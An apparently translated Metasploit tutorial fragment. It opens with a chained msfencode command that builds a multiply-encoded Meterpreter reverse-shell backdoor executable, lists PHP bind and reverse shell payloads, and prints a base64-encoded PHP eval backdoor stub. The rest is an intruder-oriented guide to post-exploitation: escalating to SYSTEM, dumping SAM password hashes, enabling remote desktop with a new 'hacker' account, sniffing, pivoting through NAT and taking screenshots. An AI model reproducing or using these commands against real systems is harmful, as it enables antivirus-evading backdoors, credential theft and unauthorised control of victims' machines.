msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=21 R | ./msfencode -e x86/call4_dword_xor -t raw -c 5 | ./msfencode -e x86/countdown -t raw -c 5 | ./msfencode -e x86/fnstenv_mov -t raw -c 5 | ./msfencode -e x86/jmp_call_additive -t raw -c 5 | ./msfencode -t exe -c 5 > /tmp/5x.exe

If you find an EXE too conspicuous, you can generate a script backdoor instead:

root@Dis9Team:/tmp/# msfpayload -l | grep php
    php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
    php/bind_perl_ipv6                               Listen for a connection and spawn a command shell via perl (persistent) over IPv6
    php/bind_php                                     Listen for a connection and spawn a command shell via php
    php/bind_php_ipv6                                Listen for a connection and spawn a command shell via php (IPv6)
    php/download_exec                                Download an EXE from an HTTP URL and execute it
    php/exec                                         Execute a single system command
    php/meterpreter/bind_tcp                         Listen for a connection, Run a meterpreter server in PHP
    php/meterpreter/reverse_tcp                      Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
    php/meterpreter_reverse_tcp                      Connect back to attacker and spawn a Meterpreter server (PHP)
    php/reverse_perl                                 Creates an interactive shell via perl
    php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
    php/shell_findsock                               

msf payload(bind_php) > generate -t raw -e php/base64
eval(base64_decode(CQkKCQkJQHNldF90aW1lX2xpbWl0KDApOyBAaWdub3JlX3VzZXJfYWJvcnQoMSk7IEBpbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLDApOwoJCQkkVXZITFBXdXsKCQkJCQkkby49ZnJlYWQoJHBpcGVzWzFdL3NlKCRtc2dzb2NrKTsK));<--BIG SNIP-->


A brief introduction to advanced meterpreter features

Meterpreter is Metasploit's default shellcode for Windows systems.
Previously Meterpreter was only a short-term stopgap during a Metasploit intrusion:
once the intrusion succeeded, you uploaded a remote-control tool as soon as possible.

But the new generation of Meterpreter has become exceptionally powerful;
I even feel that in many situations working through Meterpreter alone is enough.

Feature 1: fast privilege escalation
The getsystem command escalates privileges quickly.
Nothing could be simpler:
with one command you have SYSTEM privileges.

Meterpreter tries several methods on its own to get you SYSTEM privileges.

Feature 2: hashdump
Run this command: run post/windows/gather/hashdump
With one command you obtain the contents of the Windows SAM database,
that is, the user names and password hashes.

Feature 3: open 3389 directly
The getgui command is a newly added Meterpreter command.
It lets you easily open 3389 remote administration on the target system.
The command has two usages: run getgui -e (only enables remote administration)
run getgui -u hacker -p s3cr3t (enables remote administration and creates a new account with user name hacker and password s3cr3t)

Feature 4: network sniffing
Meterpreter has very strong network sniffing capability.
It can sniff the network without installing any driver on the target system,
and it is smart enough to ignore its own traffic.

Feature 5: network relay
The biggest difficulty hackers run into when attacking a LAN is often that they cannot get through NAT.
With Meterpreter this is now easy:
Meterpreter can turn a machine you have already compromised into a relay for attacking the other machines on the same LAN.

Feature 6: screenshots
Take a screenshot to see what is happening on the other side's computer.
This feature is easy enough to understand.

The best Metasploit tutorial: http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training